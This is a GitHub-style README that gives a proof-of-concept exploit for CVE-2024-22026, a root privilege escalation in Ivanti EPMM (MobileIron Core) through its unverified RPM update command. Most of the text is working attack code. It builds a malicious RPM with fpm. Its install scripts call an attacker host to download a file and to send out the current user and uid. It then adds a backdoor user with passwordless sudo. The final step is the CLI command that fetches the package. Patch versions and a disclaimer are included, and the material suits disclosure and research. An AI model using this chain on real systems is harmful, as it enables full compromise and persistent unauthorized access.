# CVE-2024-22026
**Exploit POC for CVE-2024-22026 affecting Ivanti EPMM "MobileIron Core"**
![image](https://github.com/securekomodo/CVE-2024-22026/assets/4809643/c7674e92-1f62-4745-84a0-49502f09cdea)

CVE-2024-22026 is a local privilege escalation vulnerability in Ivanti EPMM (formerly MobileIron) server versions prior to 12.1.0.0, 12.0.0.0, and 11.12.0.1. This vulnerability allows a local attacker to gain root access to the system by exploiting the software update process with a malicious RPM package from a remote URL.

Read the full blog post for detailed technical information: [Exploiting CVE-2024-22026: Rooting Ivanti EPMM (MobileIron Core)](https://www.redlinecybersecurity.com/blog/exploiting-cve-2024-22026-rooting-ivanti-epmm-mobileiron-core)

## Vulnerability Details
- **CVE ID**: CVE-2024-22026
- **Severity**: Undetermined
- **Attack Vector**: Local
- **Impact**: Allows local attacker to gain root access
- **Affected Versions**: Ivanti EPMM (formerly MobileIron) server versions prior to 12.1.0.0, 12.0.0.0, and 11.12.0.1
- **Patch Availability**: Patched in versions 12.1.0.0, 12.0.0.0, and 11.12.0.1

## Discovery
During our research, we discovered that the appliance uses the following command to fetch and install RPM packages as a low privilege user:
```sh
install rpm url <remote url>
```
This above command is only a CLI wrapper for the following to occur which runs as root
```sh
/bin/rpm -Uvh *.rpm
```
This underlying rpm command does not enforce any signature verification or URL filtering, meaning any RPM package can be installed. This allows an attacker to forge and deliver a malicious RPM package that can compromise the appliance.

## Exploitation POC

### Creating the Malicious RPM
The following command is used to create a malicious RPM package:

```sh
fpm -s dir -t rpm -n ivanti-privesc -v 13.37 -a i386 --description "Ivanti POC" --maintainer "exploit-poc" --before-install preinstall.sh --after-install postinstall.sh -C .
```

### Preinstall Script (`preinstall.sh`)
```sh
#!/bin/sh
curl -O http://<attacker_IP>/poc
exit 0
```

### Postinstall Script (`postinstall.sh`)
```sh
#!/bin/sh
set -e  # Enable strict error checking

# Report back current user and privilege level
CURRENT_USER=$(whoami | base64)
PRIV_LEVEL=$(id -u | base64)

curl http://<attacker_IP>/poc?user=$CURRENT_USER
curl http://<attacker_IP>/poc?priv=$PRIV_LEVEL

# Create a new root user
if ! useradd -s /bin/sh -m exploit-poc; then
  echo "Failed to add user 'exploit-poc'" >&2
  exit 1
fi

echo "exploit-poc:<redacted_password>" | chpasswd

# Grant root privileges
if ! echo "exploit-poc ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers; then
  echo "Failed to modify sudoers file" >&2
  exit 1
fi

exit 0
```

### Running the CLI Command to Fetch the RPM
To exploit the vulnerability, the attacker would run the following command in the CLI to fetch and install the malicious RPM:

```sh
install rpm url http://<attacker_IP>/ivanti-privesc-13.37-1.i386.rpm
```

## Mitigation
Ivanti has released patches to address CVE-2024-22026 in the following versions:
- 12.1.0.0
- 12.0.0.0
- 11.12.0.1

## Disclaimer

This repository and its content are intended for educational and research purposes only. Use of the information contained herein is at your own risk.
